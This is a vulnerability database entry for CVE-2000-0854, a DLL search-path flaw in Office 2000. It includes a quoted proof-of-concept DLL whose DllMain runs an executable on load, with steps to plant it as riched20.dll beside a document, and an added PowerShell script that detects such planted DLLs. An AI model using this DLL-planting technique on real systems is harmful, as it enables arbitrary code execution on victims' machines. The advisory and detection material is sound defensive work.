CVE-2000-0854
CVSS10.0
Published: 2000-11-14 00:00:00
Last revised: 2008-09-05 16:22:02
NMCOE    

[Original] When a Microsoft Office 2000 document is launched, the directory of that document is first used to locate DLLs such as riched20.dll and msi.dll, which could allow an attacker to execute arbitrary commands by inserting a Trojan Horse DLL into the same directory as the document.


[CNNVD] Microsoft Office Command Execution Vulnerability (CNNVD-200011-047)

        When a Microsoft Office 2000 document is opened, its directory is searched first for DLLs such as riched20.dll and msi.dll; an attacker can execute arbitrary commands by placing a Trojan horse DLL in the same directory as the document.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0854
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0854
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-047
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1699
(VENDOR_ADVISORY)  BID  1699
http://archives.neohapsis.com/archives/win2ksecadvice/2000-q3/0117.html
(VENDOR_ADVISORY)  WIN2KSEC  20000918 Double clicking on MS Office documents from Windows Explorer may execute arbitrary programs in some cases
http://xforce.iss.net/static/5263.php
(UNKNOWN)  XF  office-dll-execution(5263)
http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0155.html
(UNKNOWN)  NTBUGTRAQ  20000921 Mitigators for possible exploit of Eudora via Guninski #21,2000
http://archives.neohapsis.com/archives/bugtraq/2000-09/0277.html
(UNKNOWN)  BUGTRAQ  20000922 Eudora + riched20.dll affects WinZip v8.0 as well

- Vulnerability information

Microsoft Office Command Execution Vulnerability
Critical Unknown
2000-11-14 00:00:00 2005-05-02 00:00:00
Remote
        When a Microsoft Office 2000 document is opened, its directory is searched first for DLLs such as riched20.dll and msi.dll; an attacker can execute arbitrary commands by placing a Trojan horse DLL in the same directory as the document.

- Advisories and patches

        

- Vulnerability information (20232)

MS Windows 2000/NT 4 DLL Search Path Weakness (EDBID:20232)
windows local
2000-09-18 Verified
0 Georgi Guninski
N/A [download]
source: http://www.securityfocus.com/bid/1699/info

When a program executes under Microsoft Windows, it may require additional code stored in DLL library files. These files are dynamically located at run time, and loaded if necessary. A weakness exists in the algorithm used to locate these files.

The search algorithm used to locate DLL files specifies that the current working directory is checked before the System folders. If a trojaned DLL can be inserted into the system in an arbitrary location, and a predictable executable called with the same current working directory, the trojaned DLL may be loaded and executed. This may occur when a data file is accessed through the 'Run' function, or double clicked in Windows Explorer.

This has been reported to occur with the 'riched20.dll' and 'msi.dll' DLL files and some Microsoft Office applications, including WordPad.

This behavior has also been reported for files loaded from UNC shares, or directly from FTP servers.

// dll1.cpp : Defines the entry point for the DLL application.
// <windows.h> replaces the MSVC project's precompiled header (stdafx.h)
// so the file builds stand-alone; behaviour is unchanged.

#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HINSTANCE hinstDLL,
                      DWORD     ul_reason_for_call,
                      LPVOID    lpReserved)
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
            // Initialize once for each new process.
            // Return FALSE to fail DLL load.
            MessageBox(NULL, "Hello world!", "Info", MB_OK);
            MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may need to create it.", "Info", MB_OK);
            system("C:\\TEST.EXE");
            break;

        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            // MessageBox(NULL, "DllMain.dll: DLL_THREAD_ATTACH", "Info", MB_OK);
            break;

        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;

        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
    }

    return TRUE;
}

1) Rename dll1.dll to riched20.dll
2) Place riched20.dll in a directory of your choice
3) Close all Office applications
4) From Windows Explorer double click on an Office document (preferably MS Word document) in the directory containing riched20.dll
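
A defender-side check for the condition this entry describes, added here as an example (it is not part of the advisory or of the Exploit-DB record): it lists processes that have loaded a riched20.dll or msi.dll from outside the Windows directory, and finds stray copies of those DLL names sitting inside a document tree. The scanned folder ($env:USERPROFILE\Documents) is an assumption; the DLL names come from the record above.

```powershell
# Added example: hunt for the DLL-search-path hijack described in CVE-2000-0854.
# A legitimate riched20.dll / msi.dll lives under the Windows directory
# (System32, SysWOW64, WinSxS); a copy loaded from a document folder is suspect.
$Suspects = @('riched20.dll', 'msi.dll')
$WinDir   = $env:SystemRoot                     # e.g. C:\Windows

function Test-TrustedModulePath {
    param([string]$Path)
    # -like is case-insensitive, which matches NTFS path semantics.
    return $Path -like "$WinDir\*"
}

function Find-SuspiciousLoadedModules {
    # Walk every process we can inspect and report suspect-named modules
    # whose on-disk path is outside the Windows directory.
    foreach ($proc in Get-Process) {
        try { $modules = $proc.Modules } catch { continue }   # access denied / WoW64 mismatch
        foreach ($m in $modules) {
            if (($Suspects -contains $m.ModuleName.ToLower()) -and
                -not (Test-TrustedModulePath $m.FileName)) {
                [pscustomobject]@{
                    Process = $proc.ProcessName
                    PID     = $proc.Id
                    Module  = $m.ModuleName
                    Path    = $m.FileName
                }
            }
        }
    }
}

function Find-StrayDllsBesideDocuments {
    param([string]$Root)
    # Document directories should never contain files with these DLL names;
    # any hit is a planted library waiting for an Office document to be opened.
    Get-ChildItem -Path $Root -Recurse -File -Include $Suspects -ErrorAction SilentlyContinue |
        Where-Object { -not (Test-TrustedModulePath $_.FullName) } |
        Select-Object FullName, Length, LastWriteTime
}

# Assumed scan root: the current user's Documents folder.
Find-SuspiciousLoadedModules | Format-Table -AutoSize
Find-StrayDllsBesideDocuments -Root "$env:USERPROFILE\Documents" | Format-Table -AutoSize
```

Run it from an elevated shell to inspect processes owned by other users; modules of processes with a different bitness than the PowerShell host are skipped rather than reported.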

- Vulnerability information

1563
Microsoft Windows / Office DLL Search Path Weakness
Context Dependent Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

2000-09-18 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Credit

Unknown or Incomplete